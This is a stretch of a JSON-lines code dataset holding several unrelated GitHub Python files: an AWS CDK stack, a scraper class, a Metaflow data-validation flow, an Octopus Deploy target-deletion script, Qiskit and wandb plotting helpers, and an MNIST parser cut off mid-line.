to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. Include the prefix when constructing this object.\n \n '''\n \n lambda_role = iam_.Role(self, \"Role\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n iam_.ManagedPolicy.from_aws_managed_policy_name('CloudWatchFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaInvocation-DynamoDB')\n ])\n return lambda_role\n\n\n\n def api_lambda_role(self, id=None, assumed_by=None, managed_policies=None): # creating a function for defining a lambda role\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. Include the prefix when constructing this object.\n \n '''\n \n lambda_role = iam_.Role(self, \"APiRole\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n iam_.ManagedPolicy.from_aws_managed_policy_name('CloudWatchFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaInvocation-DynamoDB')\n ])\n return lambda_role\n # The code that defines your stack goes here\n\n # example resource\n # queue = sqs.Queue(\n # self, \"Sprint4MubarizQueue\",\n # visibility_timeout=Duration.seconds(300),\n # )\n \n \n def create_dbtable(self, id, partition_key=None):\n '''\n Link: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb/Attribute.html\n aws_cdk.aws_dynamodb.Table Provides a DynamoDB table.\n Parameters\n scope (Construct) –\n id (str) – \n partition_key (Attribute) – Partition key attribute definition.\n sort_key (Optional[Attribute]) – Sort key attribute definition. Default: no sort key\n Attribute-> Represents an attribute for describing the key schema for the table and indexes.\n '''\n dynamo_table = dynamodb.Table(self, id,\n # table_name=tableName,\n partition_key= dynamodb.Attribute(name=partition_key, type=dynamodb.AttributeType.STRING),\n # sort_key= dynamodb.Attribute(name=sort_key, type=dynamodb.AttributeType.STRING),\n removal_policy=RemovalPolicy.RETAIN)\n return dynamo_table\n \n # def createNewDB(self):\n # # Get the service resource.\n \n # dynamodb = boto3.resource('dynamodb')\n \n # # Create the DynamoDB table.\n # table = dynamodb.create_table(\n # TableName='bktTotableDBNAME1',\n # KeySchema=[\n # {\n # 'AttributeName': 'id_',\n # 'KeyType': 'HASH'\n # },\n # {\n # 'AttributeName': 'url',\n # 'KeyType': 'RANGE'\n # }\n # ],\n # AttributeDefinitions=[\n # {\n # 'AttributeName': 'id_',\n # 'AttributeType': 'N'\n # },\n # {\n # 'AttributeName': 'url',\n # 'AttributeType': 'S'\n # },\n # ],\n # ProvisionedThroughput={\n # 'ReadCapacityUnits': 5,\n # 'WriteCapacityUnits': 5\n # })\n \n # return table","repo_name":"MubarizKhan/web-health-monitor","sub_path":"sprint5_mubariz/sprint5_mubariz_stack.py","file_name":"sprint5_mubariz_stack.py","file_ext":"py","file_size_in_byte":36698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"75035284908","text":"\n\"\"\"\nSimple web scraping utility functions written in Python.\nNamed after the 3D spider.\n\"\"\"\n\nimport requests\nfrom lxml import etree, html\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\ndef make_driver(headless=True):\n \"\"\"\n Creates a selenium driver interface for Chrome.\n You need to install the chromedriver provided by\n Google and make it accessible through PATH to be able to use it.\n \"\"\"\n opt = Options()\n if headless: \n opt.add_argument('--headless')\n return webdriver.Chrome('chromedriver', chrome_options=opt)\n \ndef fix_suburl(prefix, url, www=False):\n \"\"\"\n More than often, URLs linked by a page are in a 'sub-URL' format :\n for example, if you scrap 'https://www.google.com', all `a` tags\n will point to URLs of the form '/news/10291029'. This function\n is here to safely merge the original URL and the sub-url to get\n a conform URL that will be correctly scraped.\n If you already have a compliant URL, you can just concatenate the\n two. This function also bundles code to determine if the URL\n should be completed with a HTTP(S)/WWW prefix.\n prefix: the base URL of the website\n url: the sub-URL to append to the URL\n \"\"\"\n www = 'www'\n http = 'http'\n https = 'https'\n https_www = www + https\n http_www = www + http\n\n if url[0] == '/':\n return prefix + url\n else:\n return url\n \ndef complete_url(url, www=False, https=True):\n \"\"\"\n If your URL does not contain any HTTP protocol prefix, you can\n use this function to add one. If you also want to add 'www' to\n the URL, use the boolean parameter of the same name.\n \"\"\"\n _www = 'www'\n _http = 'http://'\n _https = 'https://'\n https_www = _https + _www\n http_www = _http + _www\n \n if https_www in url:\n return url\n elif http_www in url:\n return url\n elif http_www not in url and _http in url and www:\n return url.replace(_http, http_www)\n elif https_www not in url and _https in url and www:\n return url.replace(_https, _https_www)\n else:\n return _https + url\n\nclass Scraper:\n \"\"\"\n A wrapper to perform web scraping atop of lxml, requests and selenium (with only\n Chrome support at the moment). You can directly provide an URL when you create\n the object to immediatly start scraping data. If you need to use selenium, you\n need to use the `make_driver` function to create a driver and provide to the object\n either in the constructor or the get function.\n \"\"\"\n def __init__(self, url=None, driver=None):\n if driver:\n self.driver = driver\n if url:\n self.get(url)\n \n def get(self, url, autocompletion=True):\n \"\"\"\n Scrap an URL using the requests module. Returned data goes into `self.page`, whereas\n raw HTML can be found in `self.html` and the lxml tree in `self.tree`. This function\n simply retrieves the HTML content without processing any client-side scripts. If the\n website you want to scrap makes heavy use of Javascript to display content, you need\n to use `get_full`.\n \"\"\"\n if autocompletion:\n nurl = complete_url(url)\n if nurl != url:\n print('\\'{}\\' autocompleted to \\'{}\\'.'.format(url, nurl))\n url = nurl\n\n self.page = requests.get(url)\n self.html = self.page.content\n self.tree = html.fromstring(self.html)\n\n def get_full(self, url, driver=None, headless=True, autocompletion=True):\n \"\"\"\n Scrap an URL using selenium. If you want client-side scripts to be executed before scraping,\n this is the function you should use rather than `get`. With selenium, we can load the page\n inside a real browser such as Chrome so that the Javascript is run by the browser beforehand.\n Aside from providing the URL, you have control over two options :\n \n 1. Provide a driver\n As opening a driver takes several seconds, it may be wise to create it beforehand then pass it\n to the function. If you don't need to use more than once, you can ignore this, as the function\n will create a one-off driver if no driver if provided. This temporary driver will be closed once\n we have scraped the data. Otherwise, you should create your driver, then pass it to each call \n of the function for every URL you want to scrap data from.\n \n 2. Enable/Disable headless mode\n A browser running in 'headless mode' simply means that no ressources are wasted on opening a\n GUI. Headless mode is enabled by default, as scraping is automated and has no need for a GUI.\n This mode is also needed if you use this function on a native terminal, with no graphical\n capabilities.\n \n TODO: Add generic browser support.\n \"\"\"\n if not driver:\n opt = Options()\n if headless: \n opt.add_argument('--headless')\n self.driver = webdriver.Chrome('chromedriver', chrome_options=opt)\n else:\n self.driver = driver\n\n if autocompletion:\n nurl = complete_url(url)\n if nurl != url:\n print('\\'{}\\' autocompleted to \\'{}\\'.'.format(url, nurl))\n url = nurl\n\n self.driver.get(url)\n self.html = self.driver.page_source\n self.tree = html.fromstring(self.html)\n \n if not driver:\n self.driver.quit()\n\n def xpath(self, *exprs):\n \"\"\"\n Once you have scraped an URL, you can query it through XPath expressions.\n This uses the lxml module. You can pass several expressions at once to\n scrap multiple elements of different nature. The results will be returned\n together.\n \"\"\"\n if not exprs:\n return []\n return self.tree.xpath(exprs[0]) + self.xpath(*exprs[1:])\n\nif __name__ == '__main__':\n sc = Scraper()\n url = 'https://www.google.com'\n sc.get(url)\n results = sc.xpath('//a/@href')\n print(results)\n \n","repo_name":"Zebralt/pyutils","sub_path":"lucas.py","file_name":"lucas.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20634942462","text":"\nfrom metaflow import FlowSpec, step, card\nimport json\n\nclass Validation_Flow(FlowSpec):\n \"\"\"\n train a random forest\n \"\"\"\n @card \n @step\n def start(self):\n \"\"\"\n Load the data\n \"\"\"\n #Import scikit-learn dataset library\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n\n #Load dataset\n self.iris = datasets.load_iris()\n self.X = self.iris['data']\n self.y = self.iris['target']\n self.labels = self.iris['target_names']\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2)\n self.next(self.data_validation)\n \n\n\n @step\n def data_validation(self):\n \"\"\"\n Perform data validation with great_expectations\n \"\"\"\n import pandas as pd\n from ruamel import yaml\n import great_expectations as ge\n from great_expectations.core.batch import RuntimeBatchRequest\n\n context = ge.get_context()\n\n \n from sklearn import datasets\n iris = datasets.load_iris()\n df = pd.DataFrame(data=iris['data'], columns=iris['feature_names'])\n df[\"target\"] = iris['target']\n #df[\"petal length (cm)\"][0] = -1\n\n # configuration for data validation checkpoint\n checkpoint_config = {\n \"name\": \"flowers-test-flow-checkpoint\",\n \"config_version\": 1,\n \"class_name\": \"SimpleCheckpoint\",\n \"run_name_template\": \"%Y%m%d-%H%M%S-flower-power\",\n \"validations\": [\n {\n \"batch_request\": {\n \"datasource_name\": \"flowers\",\n \"data_connector_name\": \"default_runtime_data_connector_name\",\n \"data_asset_name\": \"iris\",\n },\n \"expectation_suite_name\": \"flowers-testing-suite\",\n }\n ],\n }\n context.add_checkpoint(**checkpoint_config)\n\n # results of data validation\n # then build and view docs\n results = context.run_checkpoint(\n checkpoint_name=\"flowers-test-flow-checkpoint\",\n batch_request={\n \"runtime_parameters\": {\"batch_data\": df},\n \"batch_identifiers\": {\n \"default_identifier_name\": \"\"\n },\n },\n )\n context.build_data_docs()\n context.open_data_docs()\n\n self.next(self.end)\n\n \n @step\n def end(self):\n \"\"\"\n End of flow!\n \"\"\"\n print(\"Validation_Flow is all done.\")\n\n\nif __name__ == \"__main__\":\n Validation_Flow()\n","repo_name":"outerbounds/full-stack-ML-metaflow-tutorial","sub_path":"flows/ecosystem/iris_validate.py","file_name":"iris_validate.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"37"} +{"seq_id":"11557066719","text":"import json\r\nimport requests\r\nimport sys\r\nimport warnings\r\n\r\n\r\n\r\n# Define Octopus server variables\r\noctopus_server_uri = sys.argv[1] # 'http://octopus/' \r\noctopus_server_uri = octopus_server_uri + '/api'\r\noctopus_api_key = sys.argv[2] #'API-xxx'\r\n\r\nheaders = {'X-Octopus-ApiKey': octopus_api_key}\r\n\r\n\r\ndef get_octopus_resource(uri):\r\n response = requests.get(uri, headers=headers)\r\n response.raise_for_status()\r\n\r\n return json.loads(response.content.decode('utf-8'))\r\n\r\n\r\ndef get_by_name(uri, name):\r\n resources = get_octopus_resource(uri)\r\n return next((x for x in resources if x['Name'] == name), None)\r\n\r\n\r\nspace_name = ''\r\nprefix = sys.argv[3] #TentacleName\r\n\r\ntopology = sys.argv[4] #Topology type\r\nprint(\"prefix is:\",prefix)\r\nprint(\"topology is:\",topology)\r\n\r\nif topology == \"small\":\r\n targets = [prefix+\"-appvm\"]\r\nelif topology == \"medium\":\r\n targets = [prefix+\"-appvm\", prefix+\"-dbvm\"]\r\nelif topology == \"large\":\r\n targets = [prefix+\"-appvm\", prefix+\"-dbvm\", prefix+\"-rmqvm\"]\r\nelse:\r\n print(\"topology does not match any defined ones:small,medium or large\")\r\n sys.exit()\r\n \r\nspace = get_by_name('{0}/spaces/all'.format(octopus_server_uri), space_name)\r\nprint (\"Tentacles to be deleted:\",targets)\r\n\r\nfor target_name in targets:\r\n target = get_by_name('{0}/{1}/machines/all'.format(octopus_server_uri, space['Id']), target_name)\r\n if target:\r\n print (\"Deleting Target:\",target_name)\r\n print ('Tentacle Found:',target_name,'with Target-ID:',target['Id'])\r\n uri = '{0}/{1}/machines/{2}'.format(octopus_server_uri, space['Id'], target['Id'])\r\n response = requests.delete(uri, headers=headers)\r\n response.raise_for_status()\r\n print(target_name,'Tentacle has been deleted')\r\n else:\r\n print(target_name,'Tentacle was not found')\r\n warnings.warn('Tentacle was not found')","repo_name":"saurabhmik/test","sub_path":"DeleteTenant.py","file_name":"DeleteTenant.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21839029442","text":"from oslo_log import log as logging\nfrom oslo_utils import uuidutils\n\nfrom newcloudo2o.common.i18n import _LE\n\nfrom newcloudo2o.db import api as db_api\nfrom newcloudo2o.db import core\nfrom newcloudo2o.db import models\n\nLOG = logging.getLogger(__name__)\n\n\ndef create_ag_az(context, ag_name, az_name):\n aggregate = core.create_resource(context, models.Aggregate,\n {'name': ag_name})\n core.create_resource(\n context, models.AggregateMetadata,\n {'key': 'availability_zone',\n 'value': az_name,\n 'aggregate_id': aggregate['id']})\n extra_fields = {\n 'availability_zone': az_name,\n 'metadata': {'availability_zone': az_name}\n }\n aggregate.update(extra_fields)\n return aggregate\n\n\ndef get_one_ag(context, aggregate_id):\n aggregate = core.get_resource(context, models.Aggregate, aggregate_id)\n metadatas = core.query_resource(\n context, models.AggregateMetadata,\n [{'key': 'key', 'comparator': 'eq',\n 'value': 'availability_zone'},\n {'key': 'aggregate_id', 'comparator': 'eq',\n 'value': aggregate['id']}], [])\n if metadatas:\n aggregate['availability_zone'] = metadatas[0]['value']\n aggregate['metadata'] = {\n 'availability_zone': metadatas[0]['value']}\n else:\n aggregate['availability_zone'] = ''\n aggregate['metadata'] = {}\n return aggregate\n\n\ndef get_ag_by_name(context, ag_name):\n filters = [{'key': 'name',\n 'comparator': 'eq',\n 'value': ag_name}]\n aggregates = get_all_ag(context, filters)\n if aggregates is not None:\n if len(aggregates) == 1:\n return aggregates[0]\n\n return None\n\n\ndef delete_ag(context, aggregate_id):\n core.delete_resources(context, models.AggregateMetadata,\n [{'key': 'aggregate_id',\n 'comparator': 'eq',\n 'value': aggregate_id}])\n core.delete_resource(context, models.Aggregate, aggregate_id)\n return\n\n\ndef get_all_ag(context, filters=None, sorts=None):\n aggregates = core.query_resource(context,\n models.Aggregate,\n filters or [],\n sorts or [])\n metadatas = core.query_resource(\n context, models.AggregateMetadata,\n [{'key': 'key',\n 'comparator': 'eq',\n 'value': 'availability_zone'}], [])\n\n agg_meta_map = {}\n for metadata in metadatas:\n agg_meta_map[metadata['aggregate_id']] = metadata\n for aggregate in aggregates:\n extra_fields = {\n 'availability_zone': '',\n 'metadata': {}\n }\n if aggregate['id'] in agg_meta_map:\n metadata = agg_meta_map[aggregate['id']]\n extra_fields['availability_zone'] = metadata['value']\n extra_fields['metadata'] = {\n 'availability_zone': metadata['value']}\n aggregate.update(extra_fields)\n\n return aggregates\n\n\ndef get_pod_by_az_tenant(context, az_name, tenant_id):\n pod_bindings = core.query_resource(context,\n models.PodBinding,\n [{'key': 'tenant_id',\n 'comparator': 'eq',\n 'value': tenant_id}],\n [])\n for pod_b in pod_bindings:\n pod = core.get_resource(context,\n models.Pod,\n pod_b['pod_id'])\n if az_name and pod['az_name'] == az_name:\n return pod, pod['pod_az_name']\n elif az_name == '' and pod['az_name'] != '':\n # if the az_name is not specified, a defult bottom\n # pod will be selected\n return pod, pod['pod_az_name']\n else:\n pass\n\n # TODO(joehuang): schedule one dynamically in the future\n if az_name != '':\n filters = [{'key': 'az_name', 'comparator': 'eq', 'value': az_name}]\n else:\n filters = None\n\n # if az_name is valid, select a pod under this az_name\n # if az_name is '', select the first valid bottom pod.\n # change to dynamic schedluing in the future\n pods = db_api.list_pods(context, filters=filters)\n for pod in pods:\n if pod['pod_name'] != '' and pod['az_name'] != '':\n try:\n with context.session.begin():\n core.create_resource(\n context, models.PodBinding,\n {'id': uuidutils.generate_uuid(),\n 'tenant_id': tenant_id,\n 'pod_id': pod['pod_id']})\n return pod, pod['pod_az_name']\n except Exception as e:\n LOG.error(_LE('Fail to create pod binding: %(exception)s'),\n {'exception': e})\n return None, None\n\n return None, None\n\n\ndef list_pods_by_tenant(context, tenant_id):\n\n pod_bindings = core.query_resource(context,\n models.PodBinding,\n [{'key': 'tenant_id',\n 'comparator': 'eq',\n 'value': tenant_id}],\n [])\n\n pods = []\n if pod_bindings:\n for pod_b in pod_bindings:\n pod = core.get_resource(context,\n models.Pod,\n pod_b['pod_id'])\n pods.append(pod)\n\n return pods\n","repo_name":"lilingxing20/newcloudo2o","sub_path":"newcloudo2o/common/az_ag.py","file_name":"az_ag.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1454653356","text":"self = eval('self'); output = self.output # this code is cosmetic to remove the red syntax highlight error from the pycharm IDE\r\n\r\nimport logging\r\nimport os\r\ncwd = os.getcwd()\r\n\r\nlogging.info (\"working dir:\"+str(cwd))\r\n# set my variables used by loaded template\r\nvars = {'myVar': '.PY Loaded Template',\r\n 'count': 100,\r\n 'test':'helloworld'}\r\nself.templateRun('py_loaded_template.html', vars)\r\n","repo_name":"sdetoni/QuickWebDaemon","sub_path":"webapps/demo/ws_docs/demos/load_template_ty.py","file_name":"load_template_ty.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2638689227","text":"#module\n\n#1. exercise: a) create hello.py -> function hello()\n#b) import hello.py\n#c) use function hello() in this file\n\nimport hello\n\ntext = input(\"Your text: \")\ntext2 = input(\"Your new text: \")\nhello.hello(text)\nhello.newfunction(text2)\n\n#if we need only 1 function from module, we can import only this function\nfrom hello import newfunction\nnewfunction(text2)\n\n#if we want to use shorter form we can import all (*) from module\nfrom hello import *\nhello(text) #we can't use module's name (hello.hello() etc.)\nnewfunction(text2)\n\n#if we have 2 function (the same name):\nfrom hello import hello as hello_hello\ntext3 = input(\"Text3 = \")\ndef hello(text3):\n print(text3)\n\nhello(text3)\nhello_hello(text)\n\n#module builtins\nimport math\nprint(math.cos(60))\n\nimport random\nx = random.randrange(1,100)\nprint(x) #print random number","repo_name":"martafrak/Python_Course","sub_path":"9. module/9. module.py","file_name":"9. module.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26407717530","text":"# Reference:\n# https://github.com/Qiskit/qiskit-community-tutorials/blob/master/hello_world/hello_zero.ipynb\n# https://delapuente.github.io/qiskit-textbook\n\nfrom qiskit import (IBMQ, providers, Aer, execute)\nfrom qiskit.tools.visualization import plot_bloch_multivector\nfrom qiskit.visualization import plot_histogram\nimport matplotlib.pyplot as plt\n\ndef fetchBackend() :\n # IBM Q backend\n IBMQ.load_accounts()\n backend = providers.ibmq.least_busy(IBMQ.backends(simulator = False))\n print(\"Using the least busy device:\", backend.name())\n return backend\n\ndef qexec(circuit, backend = None, shots = 1000) :\n if backend is None :\n backend = defaultBackend\n # Execute the circuit on the qasm backend\n job = execute(circuit, backend, shots = shots)\n # Grab results from the job\n result = job.result()\n # Print\n print_result(circuit, result)\n # Draw\n draw_result(circuit, result)\n\ndef print_result(circuit, result) :\n print(circuit)\n print(\"Counts :\", result.get_counts(circuit))\n # print(\"State vectors:\", result.get_statevector())\n\ndef draw_result(circuit, result) :\n circuit.draw(output = \"mpl\")\n plot_histogram(result.get_counts(circuit))\n # plot_bloch_multivector(result.get_statevector())\n\n# List IBMQ backends\n# provider = IBMQ.get_provider(hub='ibm-q')\n# provider.backends()\n\n# List simulators\n# unitary_simulator\n# statevector_simulator\n# qasm_simulator\nprint(Aer.backends())\n\ndefaultBackend = Aer.get_backend(\"qasm_simulator\")\nprint(\"Default backend:\", defaultBackend.name())\n","repo_name":"neocarton/demo-quantum-hello","sub_path":"qcomp.py","file_name":"qcomp.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8396147341","text":"import wandb\nfrom wandb import util\nfrom wandb.plots.utils import test_missing, test_types\n\n\ndef pr_curve(\n y_true=None,\n y_probas=None,\n labels=None,\n classes_to_plot=None,\n interp_size=21,\n title=None,\n):\n \"\"\"Compute the tradeoff between precision and recall for different thresholds.\n\n A high area under the curve represents both high recall and high precision, where\n high precision relates to a low false positive rate, and high recall relates to a\n low false negative rate. High scores for both show that the classifier is returning\n accurate results (high precision), and returning a majority of all positive results\n (high recall). PR curve is useful when the classes are very imbalanced.\n\n Arguments:\n y_true (arr): true sparse labels y_probas (arr): Target scores, can either be\n probability estimates, confidence values, or non-thresholded measure of\n decisions. shape: (*y_true.shape, num_classes)\n labels (list): Named labels for target variable (y). Makes plots easier to read\n by replacing target values with corresponding index. For example labels =\n ['dog', 'cat', 'owl'] all 0s are replaced by 'dog', 1s by 'cat'.\n classes_to_plot (list): unique values of y_true to include in the plot\n interp_size (int): the recall values will be fixed to `interp_size` points\n uniform on [0, 1] and the precision will be interpolated for these recall\n values.\n\n Returns:\n Nothing. To see plots, go to your W&B run page then expand the 'media' tab under\n 'auto visualizations'.\n\n Example:\n ```\n wandb.log({\"pr-curve\": wandb.plot.pr_curve(y_true, y_probas, labels)})\n ```\n \"\"\"\n np = util.get_module(\n \"numpy\",\n required=\"roc requires the numpy library, install with `pip install numpy`\",\n )\n pd = util.get_module(\n \"pandas\",\n required=\"roc requires the pandas library, install with `pip install pandas`\",\n )\n sklearn_metrics = util.get_module(\n \"sklearn.metrics\",\n \"roc requires the scikit library, install with `pip install scikit-learn`\",\n )\n sklearn_utils = util.get_module(\n \"sklearn.utils\",\n \"roc requires the scikit library, install with `pip install scikit-learn`\",\n )\n\n def _step(x):\n y = np.array(x)\n for i in range(1, len(y)):\n y[i] = max(y[i], y[i - 1])\n return y\n\n y_true = np.array(y_true)\n y_probas = np.array(y_probas)\n\n if not test_missing(y_true=y_true, y_probas=y_probas):\n return\n if not test_types(y_true=y_true, y_probas=y_probas):\n return\n\n classes = np.unique(y_true)\n if classes_to_plot is None:\n classes_to_plot = classes\n\n precision = dict()\n interp_recall = np.linspace(0, 1, interp_size)[::-1]\n indices_to_plot = np.where(np.isin(classes, classes_to_plot))[0]\n for i in indices_to_plot:\n if labels is not None and (\n isinstance(classes[i], int) or isinstance(classes[0], np.integer)\n ):\n class_label = labels[classes[i]]\n else:\n class_label = classes[i]\n\n cur_precision, cur_recall, _ = sklearn_metrics.precision_recall_curve(\n y_true, y_probas[:, i], pos_label=classes[i]\n )\n # smooth the precision (monotonically increasing)\n cur_precision = _step(cur_precision)\n\n # reverse order so that recall in ascending\n cur_precision = cur_precision[::-1]\n cur_recall = cur_recall[::-1]\n indices = np.searchsorted(cur_recall, interp_recall, side=\"left\")\n precision[class_label] = cur_precision[indices]\n\n df = pd.DataFrame(\n {\n \"class\": np.hstack([[k] * len(v) for k, v in precision.items()]),\n \"precision\": np.hstack(list(precision.values())),\n \"recall\": np.tile(interp_recall, len(precision)),\n }\n )\n df = df.round(3)\n\n if len(df) > wandb.Table.MAX_ROWS:\n wandb.termwarn(\n \"wandb uses only %d data points to create the plots.\" % wandb.Table.MAX_ROWS\n )\n # different sampling could be applied, possibly to ensure endpoints are kept\n df = sklearn_utils.resample(\n df,\n replace=False,\n n_samples=wandb.Table.MAX_ROWS,\n random_state=42,\n stratify=df[\"class\"],\n ).sort_values([\"precision\", \"recall\", \"class\"])\n\n table = wandb.Table(dataframe=df)\n title = title or \"Precision v. Recall\"\n return wandb.plot_table(\n \"wandb/area-under-curve/v0\",\n table,\n {\"x\": \"recall\", \"y\": \"precision\", \"class\": \"class\"},\n {\"title\": title},\n )\n","repo_name":"wandb/wandb","sub_path":"wandb/plot/pr_curve.py","file_name":"pr_curve.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"23597046815","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pymongo\r\n\r\nclass MongoDBOutput(object): \r\n\r\n def __init__(self, db_name, collection_name):\r\n self.client = pymongo.MongoClient(\"localhost\", 27017)\r\n self.db = self.client[db_name]\r\n self.collection = self.client.db[collection_name]\r\n def insert_to_mongo(self, data):\r\n if data is None:\r\n return\r\n self.collection.insert(data) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BensonBair/Taifex-Web-Scraping-to-MongoDB","sub_path":"crawler_oop/MongoDBOutput.py","file_name":"MongoDBOutput.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42034998150","text":"Math = []\nDBMS = []\nDSA = []\ntotal = []\npercentage = []\navg = []\n\nfor i in range(3):\n print(\"\\t\\t\\t For Student:\", i+1)\n Math.append(int(input(\"Enter Your Maths Marks: \")))\n DBMS.append(int(input(\"Enter Your DBMS Marks: \")))\n DSA.append(int(input(\"Enter Your DSA Marks: \")))\n total_marks = Math[i] + DBMS[i] + DSA[i]\n total.append(total_marks)\n avg_marks = total_marks / 3\n avg.append(avg_marks)\n percent = (total_marks / 300) * 100\n percentage.append(percent)\n\nfor j in range(3):\n print(f\"Student:{j+1} Maths Marks:\", Math[j], \"DBMS:\", DBMS[j], \"DSA:\", DSA[j], \"Total Marks:\", total[j],\n \"Average Marks:\", avg[j], \"Percentage:\", percentage[j])\n","repo_name":"M-Rohail/Python_Concepts","sub_path":"Lecture 1 task.py","file_name":"Lecture 1 task.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29037238258","text":"from student import Student\nfrom student import Department\nfrom student import Course\n\nstudent_1 = Student(\"John Rambo\", 1)\n\ndepartment_1 = Department(\"IT\", 2)\ndepartment_2 = Department(\"Marketing\", 3)\ndepartment_3 = Department(\"Sales\", 4)\n\ncourse_1 = Course(\"DevOps\", 3, department_1)\ncourse_2 = Course(\"Python\", 4, department_1)\ncourse_3 = Course(\"SEO\", 5, department_2)\ncourse_4 = Course(\"CRM - SalesForce\", 6, department_3)\n\n","repo_name":"meg991/OOP","sub_path":"Structured/main_firstpat.py","file_name":"main_firstpat.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24389474998","text":"# -*- coding: utf-8 -*-\nimport os\nimport struct\n\nimport cv2\nimport numpy as np\n\n\nclass DataUtils(object):\n\n def __init__(self, filename=None, outpath=None):\n self._filename = filename\n self._outpath = outpath\n\n self._tag = '>' # 大端格式\n self._twoBytes = 'II'\n self._fourBytes = 'IIII'\n self._pictureBytes = '784B'\n self._labelByte = '1B'\n self._twoBytes2 = self._tag + self._twoBytes\n self._fourBytes2 = self._tag + self._fourBytes\n self._pictureBytes2 = self._tag + self._pictureBytes\n self._labelByte2 = self._tag + self._labelByte\n\n self._imgNums = 0\n self._LabelNums = 0\n\n def getImage(self):\n \"\"\"\n 将MNIST的二进制文件转换成像素特征数据\n \"\"\"\n binfile = open(self._filename, 'rb') #以二进制方式打开文件\n buf = binfile.read()\n binfile.close()\n index = 0\n numMagic, self._imgNums, numRows, numCols = struct.unpack_from(self._fourBytes2, buf, index)\n index += struct.calcsize(self._fourBytes)\n images = []\n print('image nums: %d' % self._imgNums)\n for i in range(self._imgNums):\n imgVal = struct.unpack_from(self._pictureBytes2, buf, index)\n index += struct.calcsize(self._pictureBytes2)\n imgVal = list(imgVal)\n images.append(imgVal)\n return np.array(images), self._imgNums\n\n def getLabel(self):\n \"\"\"\n 将MNIST中label二进制文件转换成对应的label数字特征\n \"\"\"\n binFile = open(self._filename, 'rb')\n buf = binFile.read()\n binFile.close()\n index = 0\n magic, self._LabelNums = struct.unpack_from(self._twoBytes2, buf, index)\n index += struct.calcsize(self._twoBytes2)\n labels = []\n for x in range(self._LabelNums):\n im = struct.unpack_from(self._labelByte2, buf, index)\n index += struct.calcsize(self._labelByte2)\n labels.append(im[0])\n return np.array(labels)\n\n def outImg(self, arrX, arrY, imgNums):\n \"\"\"\n 根据生成的特征和数字标号,输出图像\n \"\"\"\n output_txt = self._outpath + '/img.txt'\n output_file = open(output_txt, 'a+')\n\n m, n = np.shape(arrX)\n # 每张图是28*28=784Byte\n for i in range(imgNums):\n img = np.array(arrX[i])\n img = img.reshape(28, 28)\n # print(img)\n outfile = str(i) + \"_\" + str(arrY[i]) + \".bmp\"\n # print('saving file: %s' % outfile)\n\n txt_line = outfile + \" \" + str(arrY[i]) + '\\n'\n output_file.write(txt_line)\n cv2.imwrite(self._outpath + 